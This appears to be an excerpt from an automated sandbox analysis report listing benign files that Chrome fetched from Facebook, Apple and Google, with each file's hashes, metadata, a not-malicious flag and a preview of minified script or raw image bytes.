                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("AbstractSidebarDefaultRouterLink.react",["GeoDomID","Link.react","react"],(function(a,b,c,d,e,f,g){"use strict";var h,i=h||d("react");function a(a){var b=a.children,e=a["aria-describedby"],f=a["aria-labelledby"];a=babelHelpers.objectWithoutPropertiesLoose(a,["children","aria-describedby","aria-labelledby"]);f=d("GeoDomID").useApplyGeoDomIDsDirectly({"aria-describedby":(e=e)!=null?e:void 0,"aria-labelledby":(e=f)!=null?e:void 0});e=f.ref;f=babelHelpers.objectWithoutPropertiesLoose(f,["ref"]);return i.jsx(c("Link.react"),babelHelpers["extends"]({linkRef:e},a,f,{children:b}))}a.displayName=a.name+" [from "+f.id+"]";g["default"]=a}),98);.__d("AbstractSidebarRouterLinkContext",["AbstractSidebarDefaultRouterLink.react","react"],(function(a,b,c,d,e,f,g){"use strict";var h;a=h||d("react");b=a.createContext(c("AbstractSidebarDefaultRouterLink.react"));g["default"]=b}),98);.__d("AbstractSidebarLink.react",["cx","AbstractSidebarRouterLinkContext","GeoDomID","joinClasses","
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):1189
                                                                                                                                                                                                                                Entropy (8bit):4.4877009445301965
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:t4pt6kwjNllHfeyQTGWug+7V1AUczWf66yad1VDheBK8bwoN5L+:o0k+8TOg2Pf6y1ZhkrwoNV+
                                                                                                                                                                                                                                MD5:61226AFCAE6A8F2B3D2755728DAAF4F2
                                                                                                                                                                                                                                SHA1:8489CAF428F9F579A8B31AEAD973F6C361711414
                                                                                                                                                                                                                                SHA-256:47EAAEA809BFE2FD94F78F3C94372B6328F37748BC0EEDFD1B2AB937027962CB
                                                                                                                                                                                                                                SHA-512:C1F23A9E1555C1BDB558781327EE018F2825C2C2238945866351DA248CD39FF9102D729078A47040BB00516CFADFD2B5EF2C88B661A76563A65553B7C7421FC4
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://apps.apple.com/assets/images/masks/icon-app-mask-border-61226afcae6a8f2b3d2755728daaf4f2.svg
                                                                                                                                                                                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" width="100%" height="100%" viewBox="0 0 230.5 230.5" version="1.1"><path fill="none" stroke="#000" stroke-linejoin="round" stroke-miterlimit="1.41" stroke-opacity=".1" stroke-width="1" d="M158.22 230H72.28l-8.22-.01a320 320 0 0 1-6.93-.11c-5.05-.06-10.09-.5-15.07-1.32a50.83 50.83 0 0 1-14.33-4.73 48.2 48.2 0 0 1-21.07-21.06 50.85 50.85 0 0 1-4.72-14.34 100.68 100.68 0 0 1-1.33-15.07c-.06-2.31-.1-4.62-.1-6.93-.02-2.74-.02-5.48-.02-8.22V72.29c0-2.75 0-5.48.02-8.23a320 320 0 0 1 .1-6.93c.06-5.05.5-10.08 1.33-15.06a50.74 50.74 0 0 1 4.72-14.34A48.2 48.2 0 0 1 27.74 6.66a51.02 51.02 0 0 1 14.33-4.73C47.05 1.12 52.09.67 57.14.61a320 320 0 0 1 6.93-.1L72.3.5h85.92l8.23.01a320 320 0 0 1 6.92.1c5.06.07 10.1.5 15.08 1.33 4.98.85 9.81 2.45 14.33 4.72a48.19 48.19 0 0 1 21.07 21.07 50.9 50.9 0 0 1 4.72 14.34c.82 4.98 1.27 10.02 1.33 15.07a320 320 0 0 1 .1 6.92l.01 3.48v94.09l-.01 4.8c-.01 2.3-.05 4.62-.1 6.93-.07 5.05-.5 10.08-1.33 15.07a50.68 50.68 0 0 1-4.7
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (847)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):13822
                                                                                                                                                                                                                                Entropy (8bit):5.308557467153006
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:YPNfrSf3gy1fQx56zKsvEsSDIiFtTislPchPTwFlOvHChmC82YFK:YPNzSf3g6zKIHqtpRKEuvHTC82Yg
                                                                                                                                                                                                                                MD5:2A92CDD99A42BFCD7DAB16887539E231
                                                                                                                                                                                                                                SHA1:310E2855E334F6F49937490D621710021B15066B
                                                                                                                                                                                                                                SHA-256:F20C946DA61069DF3F4DC8097FB617DB50F266D25D53758D91FCCBD8341C533C
                                                                                                                                                                                                                                SHA-512:7DBD1CA6AF6E7AA86F408C6E3D5D35AA49AD39908D8AB10AEF4CF8C806AF27889DA43D8AEDDEE030E6351DF1D81442B431C6AF206A4DF6E9BFB043892850EF49
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:/*! For license information please see chunk.15.097368f212a6a942763f.js.LICENSE.txt */.(self.webpackChunk_ember_auto_import_=self.webpackChunk_ember_auto_import_||[]).push([[15],{21015:function(e,t,n){"use strict".e.exports={canvasAvailable:n(1892),continuousScrollEventsAvailable:n(93117),cookiesAvailable:n(2022),cssLinearGradientAvailable:n(83353),cssPropertyAvailable:n(15871),cssViewportUnitsAvailable:n(77499),elementAttributeAvailable:n(13462),eventTypeAvailable:n(70683),isDesktop:n(13459),isHandheld:n(30677),isRetina:n(25152),isTablet:n(53489),localStorageAvailable:n(83574),mediaElementsAvailable:n(58093),mediaQueriesAvailable:n(28342),prefersReducedMotion:n(54719),sessionStorageAvailable:n(63160),svgAvailable:n(91676),threeDTransformsAvailable:n(78795),touchAvailable:n(50012),webGLAvailable:n(72810)}},1892:function(e,t,n){"use strict".var r=n(93796),i=n(6379),o=function(){var e=r.getDocument().createElement("canvas").return!("function"!=typeof e.getContext||!e.getContext("2d"))}.e
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65005)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):696227
                                                                                                                                                                                                                                Entropy (8bit):5.38605387106501
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:MGryUmPKObVMvcDMbtZNNVJKEq5f+dtaL6rHYGd/0GOCl/FQ1:TryUmiObivKMJZNTJKjp+dtaLq/FQ1
                                                                                                                                                                                                                                MD5:90ED61CCFDBF59C72D9D5422BEA4C15D
                                                                                                                                                                                                                                SHA1:DEC09B632108E19481F94F9CBD378E7AEB11452F
                                                                                                                                                                                                                                SHA-256:6604C5A7BFA2E3F142248368D7C69135A8191D03C72D1024807150C32F4E8E55
                                                                                                                                                                                                                                SHA-512:E99CFB370A8AF78ADA7252C5C28756731BBCDB28B71C7B671473C461BCF76A6147111D585A89631CEE3A0F693D45F7A9D3DC7462790EF8048631D96C457694D3
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:/**. * IMPORTANT NOTE:. *. * This file is licensed only for the use of Apple developers in providing MusicKit Web Services,. * and is subject to the Apple Media Services Terms and Conditions and the Apple Developer Program. * License Agreement. You may not copy, modify, re-host, or create derivative works of this file or the. * accompanying Documentation, or any part thereof, including any updates, without Apple's written consent.. *. * ACKNOWLEDGEMENTS:. * https://js-cdn.music.apple.com/musickit/v1/acknowledgements.txt. */..!function(e,n){"object"==typeof exports&&"undefined"!=typeof module?n(exports):"function"==typeof define&&define.amd?define(["exports"],n):n((e="undefined"!=typeof globalThis?globalThis:e||self).MusicKit={})}(this,(function(e){"use strict";var n=void 0!==typeof self?self:this;function formatArtworkURL(e,n,d){return n=n||e.height||100,d=d||e.width||100,window.devicePixelRatio>=1.5&&(d*=2,n*=2),e.url.replace("{h}",""+n).replace("{w}",""+d).replace("{f}","jpeg")}const
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:PNG image data, 283 x 263, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4185
                                                                                                                                                                                                                                Entropy (8bit):7.930678153674384
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:NT31C9FxEGbTBRaRHPa2+F9/21MAJG5tXqq+QEsM8j:14vblcP9S9/21MAJG5tXqqPx
                                                                                                                                                                                                                                MD5:751D367A30A43C744E348FCFB4CB923B
                                                                                                                                                                                                                                SHA1:1269F17B9303BB44B88FCF35CFF9737004F60126
                                                                                                                                                                                                                                SHA-256:9A853EE2B4A016F552DAABBBE4170098422174DABF5967FBAFDEBD604119F91C
                                                                                                                                                                                                                                SHA-512:98E2A077C9831DAF2806A7121BF8D9A9EF10634E05C50CBD9E6EDE7661B8A5FF2A39687D956531BC92D6D634CBE5679A7C2B427358839F5C365E9B7312D29970
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:.PNG........IHDR.....................PLTELiq.)3*18X_f~...........%/9@G.&0......ccc...nu}............CJQ!,6......?FM7>E!(.LSZ.'2...:AHhow3:A......&-3....../7=bjq............FMT,39'2<.....emt........<DJ..........HOVy~.$.9......T[c...S[b......[cj.........JQX+6A......]elccc...x}....uy|")/fnusz....y..........GNUOV]|..jry...(/5..........ccc...?g..%/......Bc..-<...aip(>]4R.)3>",7.......)3CJQ\dl...#-8...T[c.'2...FMT.................&0emtsz....3:@....X_fy~.QY`?FMOV]......JQX....../:E;CJ...&1;GNULSZ+28+6A.................9@G...hownu}..........!(......y..jqy...~..2<H......4?J...}............u}...................aly.......pw................................................../6=...[frksz...bjq...Y`g|.....?IU......dks'.4_gn...HS_uy|..........7BMOZf...08>...7>E...EP[...&-3...5My*:UU`md.."...ftRNS...&f....r..{....M..)6....P..t.k:.H."....=f..,J...FX...b.. ....^....o..y. ..4.2[....R.r.D.l..s.....IDATx...ip.e...g....+...BB. ..K..A.9....\w...........[.I .. @...-.(
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1876
                                                                                                                                                                                                                                Entropy (8bit):7.843578031167886
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:48:TlqrfUmQnMSOlQeRWSXYLXsYKrsuuUNNgW/GfY1qq9:TlqQGS6BYSoLXsYKAB0gW/GaqG
                                                                                                                                                                                                                                MD5:83D5EF2DFF03919ADFD81050C4B8E546
                                                                                                                                                                                                                                SHA1:A82F473545582E27C46A3DAE1CB979704760AF12
                                                                                                                                                                                                                                SHA-256:BE92330AD3F3AC85632801AAC147EDE0AA9A1DCA7579CC68EB3812DF84507B62
                                                                                                                                                                                                                                SHA-512:E7296B09AB3B71866C006085A39756D8F27A59524A47E0996C3FA1EE381FDB23EDAB319531D01D78FBAA7E70ED0DB37EBDA46ED7C513F800023019DB4CBCBB6B
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:RIFFL...WEBPVP8X..............VP8 ....P&...*....>.H.I#"!.i$.4...p..q...?......+...;....$......k_...X<.~.~...t..`..........e.a.M.c....8..o.....0..O.yc.N.s.. ...ZQ&w...`.....D.6..G....(.w(L...g..:..0E.b.U.G.F+~L....3..{.>&/.a,.~..L\ #._.L..2..kA......~..9'@D...O.gA.0".3.p....I}.U..[%.z..)X.+`h[bH'._......(.7..^.K..T...1...s.....KU..\(mi.......o..S...........v4.....).G..l.E.2...M. ....m..(v.;..NH.]}.n..!.Y..?....P.._...%....-.....=T...D...o#....9..vL...w...C..!;.%U..5:...8.Z...a^..-Lq...<B3..D.'..i.=..?/.E..4...H.!.+...(..../... ?....rz5k^.V...%....xWg.O..5.}..lcj.]U2.W>.3.~4...A.\...~.\.........Xm...XR)h........aM...k.;.....%tZ_.3...mN...}.^.H.8bP..6>jw...-.I.!.".....+a..._...N..t*6..*`.:.F....H...ij........]..._.......T.aw.9P.... )..%q{..)R..S........1...!..~.lG.nC..U.n....[.'.~/.G ._Z...,.D..b..........SP..m..T.I.C....=....x.....R..*7.).o#.=.Xm.@.~.Wj./m7.=%...v.Fbz.+.a..F.)g...h.]G...........L.X....h.C.....o1@.....f....4"`.U.=.y%..\.s..K.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):645
                                                                                                                                                                                                                                Entropy (8bit):7.631563068517978
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:6v/7ihaL0Z6T2rkLv0cLSbLzKlRv+reS0TZPhnv8NuKS8jrRJI1b3g0hfue9:riS+v05bLzK7CmTRhnUTJjk1b3Jhfj
                                                                                                                                                                                                                                MD5:EA2722D3B676D5CDD4F7225E65695112
                                                                                                                                                                                                                                SHA1:97E5E94CFF5B62F60BA76C7DD9F606304AF8B10C
                                                                                                                                                                                                                                SHA-256:317E5FDAA14E548C0045D5E662709CFE0B692E0384A8396CF22054BF0A1E1C48
                                                                                                                                                                                                                                SHA-512:BF06CE48B306A0EA13EBC7BE92CB56440DDF1C35C214BA7C164DECFDA6E2E7AAAB31605196D0690BE4FF509404701CA620C504A5EDF0C3E6A12C6FA5A73C78DA
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://fonts.gstatic.com/s/i/productlogos/avatar_anonymous/v4/web-32dp/logo_avatar_anonymous_color_1x_web_32dp.png
                                                                                                                                                                                                                                Preview:.PNG........IHDR... ... .....szz....LIDATx.b .<|...P|.h(.E.0.....|.x.......a.....!.....q{.t.U...(.A.g.....w.3,&.s.~..h2.....Ip=..4!..[.................r.p6.R......R.....19]z.......%.E.q..........6".#...9..Y.n.U.ZU.ZMu:.Q:t%..y`<.+.0T6.=.i.0.e..a.f...b.\..Ax..e...K...$7..BAk@.\f..}bG.K....\Nk@.T.ha.+.w.%x.5.....k..OJr...$Gd....,.0....n.{..b........%].....K.....?....f....w....j4...@%p{?...|>.....hH.h.....r....h..s.J..@X.j..3#h>.`@Xw..l.K.;).c..>....V.b. T....0B.4....%G......a[..P.........G..B"..!*...m9rj%.....E.AD*...0...!..y``....o.z...1J.FF,..sEr3.s.&....b.m.+.........'.m3(D..{..:..So.Ja..*......#..'....IEND.B`.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 720x352, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):46200
                                                                                                                                                                                                                                Entropy (8bit):7.9955704705259585
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:768:9BueLEuAAOchHt+Zlfl+DfOIC95tpWT06ISQffs0nEEsjvaGFZIfes+rdUX6qcGD:PueJAahHt+ZlAjOXVYlyEEYvzZ5dUXlh
                                                                                                                                                                                                                                MD5:912E5E91C9202A2D5433564D1D9091C4
                                                                                                                                                                                                                                SHA1:DFA408003ECD5E844841D6E92E80B040E9139F6F
                                                                                                                                                                                                                                SHA-256:84CAFC0A14060976134E63A4F407E482D5473BB429187F00DBE56258D304A9A0
                                                                                                                                                                                                                                SHA-512:792A2CBD0A48765C1A43540BF2097098BA001B5A1DA054ABDA797DDED0BBD57365CB08787099699471738566F55983921E7F73A582EAB83CA7914B469C2C9437
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://play-lh.googleusercontent.com/CgUPurtUp8SB709wsQcKLMv6JdIh1em0ka_58V69AorznLv42TV39etS2rt28wv9Rz8=w720-h405-rw
                                                                                                                                                                                                                                Preview:RIFFp...WEBPVP8 d........*..`.>U$.E#.!%)4....cm....P{c...e.q>v.-+..W.w....%.~?.........K...y....._...?....../V_.....{......S.......=....<........g.....{...............~.......................g.......x........c...;....7.z.2.....5.7.7O..........._a.....O........S...........o...?...?z....~...lh..h..F....L.I.......X]:N.....R..81"W1/.4...!.......-..b...c.Yqp.2........!D.,=.b.po.;..."....7..1_.P..+"T.....v#e.'...r..qN..P.....?..f...P..}B]ZX....Gz....&......0.M...*4&LK#~.{.H\.r~....R-..*:.....Qpm8..;..;.]..^......).v...d.S.......`.r`..%..IM#W.....n..........=l%..$&..Tr.!.B3L.&J3..sM.%m.o.e.?f...Yt.b.3Aw;........=...%.%...9.,.d..@.&*.khV.&...9.cO^.,...d.B...k..XGb........97.......p<.^.H..ZB..a....ou...w.......Ma......aD.......R......$A'g../la..7Db...\F.s...-..$..:.B.jQ....}..L.....8^.N`.C ..i..k..N.....S...Y.F..4.u..I_...d3.k..WT....0.......+]:%..AVZ.f.U.[...\|\`....-...%..<.O...U..{}2.a........Xg.....Uu........'.t...^xg.x.B]...~..........:.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (5671)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):31589
                                                                                                                                                                                                                                Entropy (8bit):5.294834621726941
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:/mgUaozX0BYAqIkvN+P5wRgsZ034sCh4Ni:/mBayFS54sCu0
                                                                                                                                                                                                                                MD5:B27D43AE35D63DDA7645B7E2184B6EA4
                                                                                                                                                                                                                                SHA1:4F8D7E7858A8F295020D6A5D97BC829043146C0B
                                                                                                                                                                                                                                SHA-256:A90C6FD2D1EBB37CBEF5CB96AC530805D7D981C5BC3F51A1B30F9C80BEC9C7AA
                                                                                                                                                                                                                                SHA-512:3A0239E36F67FAAE360473AA6574306C251333EB300D6C5A7F6165756633BD543B30E5471E51830DBABC4F039AE70A3467D08B3E4366662BF714B34E0DDD9E52
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("AbstractContextualDialogKeepInViewportBehavior",["ContextualLayerDimensions","Event","Vector","abstractMethod","throttle"],(function(a,b,c,d,e,f){a=function(){"use strict";function a(a){this._layer=a,this._listeners=[],this._subscription=null,this._minimumTop=null}var c=a.prototype;c.enable=function(){var a=this,b=this._layer.getArrowDimensions();this._arrowOffset=b.offset;b=b.length;this._arrowBuffer=this._arrowOffset+b;this._subscription=this._layer.subscribe(["show","hide","reposition"],function(b,c){if(a._layer.isFixed())return;b=="reposition"?(a._calculateMinimumTop(c),a._adjustForScroll()):b=="show"?(a._attachScroll(),a._adjustForScroll()):a._detachScroll()});this._layer.isShown()&&this._attachScroll()};c.disable=function(){this._layer.isShown()&&this._detachScroll(),this._subscription.unsubscribe(),this._subscription=null};c.__adjustForScroll=function(a,c){return b("abstractMethod")("AbstractContextualDialogArrowBehavior","__adjustForScroll")};c._attachSc
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:PNG image data, 56 x 56, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):934
                                                                                                                                                                                                                                Entropy (8bit):7.454104258058445
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:6v/7K/eqPymvzlPXBpjOCHdqElk9UjJbtxkZFdNiYWkW80m9SWkCufVN1irXYSfZ:TTH9BZOetBterGbkEKWCtV
                                                                                                                                                                                                                                MD5:1E5A92669FCA2EB7B9174FEB5F52612F
                                                                                                                                                                                                                                SHA1:28DEBACAE4E549EFA49CFA56E9EB4A03E057BF3E
                                                                                                                                                                                                                                SHA-256:BAE890B102159778D15CCBF68F5EA5F7220722799003F7E760DF2047CF8E9C1B
                                                                                                                                                                                                                                SHA-512:1671046E2BAE322F419A1C795E1CEC0208DB536137534A9DC7A27B28F294E2DAE1AE0AF7098A38DB20FE41A6E0AFC06964B9D3735988F083B7C5009B389EAC10
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://apps.apple.com/assets/button_glyphs/video_control_replay_white-1e5a92669fca2eb7b9174feb5f52612f.png
                                                                                                                                                                                                                                Preview:.PNG........IHDR...8...8.......;.....sRGB........DeXIfMM.*.......i.......................................8...........8.....WhS....IDATh..k.A..s.E..1.H...),L.Gc@.A.[!]..hic. X...L.6.AT...P.>.Q4.F.P|E....a.....d.|..3....w....b.b.b.b.b.b.b.b.b.VH....~..<ZV%SP.......eQ$.l.S.*..@.9.>HQ.^c2.6..D.A..T......}F.......?..7.........F...y...u....7 ..../.......t....fU..=`R.;w..........U........an..&....w.......CY7...4...!..m3@...uY"8.....5.y....2Y.q..I>.j.M..ZE...L..3.......~7......2....yy....n.jW.I26@zI..e.V]^U5";.......|..7...........;..;...!I_.J...p...6..<.n.Lo./...-...y.\.L..W.....r...^2.._....+.?O.zY..Zag1...4....Q...G.2W.6..t...Z}G.lO.jSEe....._.w..B... ..`8.Rm:%.1K..V%....Z....a.k.+d.2...g...%.=...M......{[......Zj2.M.0,.....r.5.!..........f_...1...f\......d...4..a..OV..5..43..M-&+9...H.Z.rE.=..;..e....\....Y..0X...}..."z.k'.a`.<...-..=p.W./..b.b.b.b.b.b.b.b.b.b.....>.v.........IEND.B`.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1386
                                                                                                                                                                                                                                Entropy (8bit):4.8492224043496055
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:Yorj8jYfQypuazl92Qypua5HR9Iszb9mPuazEBb9mPuaSlSfvBLRKkfkMqVlM:Y4XzZzlkZTyszbgzEBbg+SJRKtpM
                                                                                                                                                                                                                                MD5:662EA2BBC39B50BCDCBE04DC2CD7A087
                                                                                                                                                                                                                                SHA1:4705F797D3E54D7953493DEBA121A8B4C397060F
                                                                                                                                                                                                                                SHA-256:BFA43BCF43FA6CED5E1AF0BA042098DA244E4441A9C1D53E4B7B0DBFE764B1C6
                                                                                                                                                                                                                                SHA-512:7E9903DE3548135C5C17813B2438D337BB565CEA17E6C3A5A4D7FF4B3A197A67B9FA6A16296A13174C5FA0D2E77EFBEC019E816541E074ACDB764F88EC685028
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:{"blacklistedFields":[],"constraints":{"profiles":{"AMPWeb":{"precedenceOrderedRules":[{"filters":{"nonEmptyFields":["isSignedIn"]},"fieldConstraints":{"clientId":{"generateValue":true,"namespace":"AMPWeb_isSignedOut","expirationPeriod":86400000}}},{"filters":{"valueMatches":{"isSignedIn":[true]}},"fieldConstraints":{"clientId":{"fieldType":"id","generateValue":true,"namespace":"AMPWeb_isSignedIn","expirationPeriod":15552000000}}}]}}},"treatmentProfiles":{"AMPWeb":{"treatments":[{"filters":{"isSignedIn":{"nonEmpty":true}},"fieldActions":{"clientId":{"treatmentType":"idGenerator","storageKeyPrefix":"mtClientId","namespace":"AMPWeb_isSignedOut","lifespan":86400000}}},{"filters":{"isSignedIn":{"valueMatches":[true]}},"fieldActions":{"clientId":{"treatmentType":"idGenerator","storageKeyPrefix":"mtClientId","namespace":"AMPWeb_isSignedIn","lifespan":15552000000}}}]}},"compoundSeparator":"_","fieldsMap":{"cookies":["itcCt","itscc"],"custom":{"impressions":["id","adamId","link.type","station-
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2238
                                                                                                                                                                                                                                Entropy (8bit):7.850368095712798
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:48:EYTHncpBSKijTsM7q9vn/ENNPGDyPt1FFD8YqzFyfC9yo6hi+TTM:EYTHcvLM7gEmDyAY8Fyf2y/M
                                                                                                                                                                                                                                MD5:E650F1867FA1D536CE3E0979F17FEA60
                                                                                                                                                                                                                                SHA1:2E57A290B608C8D976CF10692A3B6F3FCE0E3EF1
                                                                                                                                                                                                                                SHA-256:371416913DBA9BB3E700C8315B4F54F296F807AB6178A2E3101CD148FA281F19
                                                                                                                                                                                                                                SHA-512:84753A2C2F0C25EF4A410F9B961C7AA2C5AB93B5E809FD333EE5F7A76BB9CDE6B49ECE11C4FF0F0282673199B15B1C667431DE8FA94B19728945106481F448A9
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:RIFF....WEBPVP8X..............VP8 4....+...*....>.N.I."!...D....f+.........w.....!.&~;F.._0..~.^c.k.]=..{.............M.O.6...e..^.V..p.|..ompNg.<z...hv.)..Q...S....O.n.O..,T..|U..?.x.....`:.9./.......7....'T.W......#..F\E5M....w...r....i...hL.9.IWK.jD.-K..{...j}n.nP.1kU.P...K.R.^.epJ.ND......x.`....G.}_^...Z.\Z.r....<.z.2.3\.9....G.GY.C6Z..~.w.......1fwaU.<.yW.+.X_.c.nC4.^.z..............)......R.2....h..(d8..1.(,W.......m..Hq.`aS.-|S87..<yZ...5=.yYp6...r...1.o.q.....|?].....w....C...;.._.N...]w.....M...2.X=..*..'y.V._.."5..8y..=.J.o........?'8.;Q?'+!....=..7......a.Rl..7...6|..=......Qh.... P......"{..>cR.......~..d..'[Z....V.nZ-h..}J.pxP..`..R.Rd......q.|..Q.W.(.c........_.....w..f..w..<..2.B6>P......6..5.._w.c..X...P..O0.r......(,..w..N....1Rx3a$..55......A..X.....$W..'.|.}.\..M..S....z..$V...?.....k....]3....P.}_...vG......_LYH...Xt....o.zY.....L8..'p.....J....o.........?..!.E.V"}.< R.."i.!...n...3../'6.....[......d.*.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1130)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):1854
                                                                                                                                                                                                                                Entropy (8bit):5.311393905103868
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:48:SKh3RakwAerXcySXPpQxpNpm1TsPSnryYml9:xh8kwA0Gb1TSork9
                                                                                                                                                                                                                                MD5:5025D5524D28AA6879A5F6504C6F1540
                                                                                                                                                                                                                                SHA1:D698AFAAE964F9EE09E3C9BAB04775367E1AAD12
                                                                                                                                                                                                                                SHA-256:C032E30CA71DBF354429DBA854AF78020A36BAC804397992C317A2667128AB47
                                                                                                                                                                                                                                SHA-512:AEAE9632C460D6E5850A3FAF1246EEA8AF0A88CA4A902ED4B2B3CE7D94AD5825D76B31B2372B6CEC3F2E33CDE216853B53FD8FC0203B6CFD01F7B8ED263EAF4A
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3/yr/r/jJPH6iCu1HH.js
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("SubscriptionsHandler",["invariant"],(function(a,b,c,d,e,f,g,h){"use strict";function i(a){return a.remove||a.reset||a.unsubscribe||a.cancel||a.dispose}function j(a){i(a).call(a)}a=function(){function a(){this.$1=[]}var b=a.prototype;b.addSubscriptions=function(){for(var a=arguments.length,b=new Array(a),c=0;c<a;c++)b[c]=arguments[c];b.every(i)||h(0,3659);this.$1!=null?this.$1=this.$1.concat(b):b.forEach(j)};b.engage=function(){this.$1==null&&(this.$1=[])};b.release=function(){this.$1!=null&&(this.$1.forEach(j),this.$1=null)};b.releaseOne=function(a){var b=this.$1;if(b==null)return;var c=b.indexOf(a);c!==-1&&(j(a),b.splice(c,1),b.length===0&&(this.$1=null))};return a}();g["default"]=a}),98);.__d("throttle",["TimeSlice","TimeSliceInteractionSV","setTimeout","setTimeoutAcrossTransitions"],(function(a,b,c,d,e,f,g){function a(a,b,d){return h(a,b,d,c("setTimeout"),!1)}Object.assign(a,{acrossTransitions:function(a,b,d){return h(a,b,d,c("setTimeoutAcrossTransitions"),!1
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:MS Windows icon resource - 3 icons, 48x48, 24 bits/pixel, 32x32, 24 bits/pixel
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):12014
                                                                                                                                                                                                                                Entropy (8bit):5.8597190788401115
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:L7xWVSgHQUkVbBQZf8POXQu2jMLlZYrZ7667V776+:L7xWVSgiV27QfjMLcrj
                                                                                                                                                                                                                                MD5:87052396F5FFD63B642D1BAB54E7EDB7
                                                                                                                                                                                                                                SHA1:F3E75DDE1FAD3A5FE639E3D0C04122FCFAB918E2
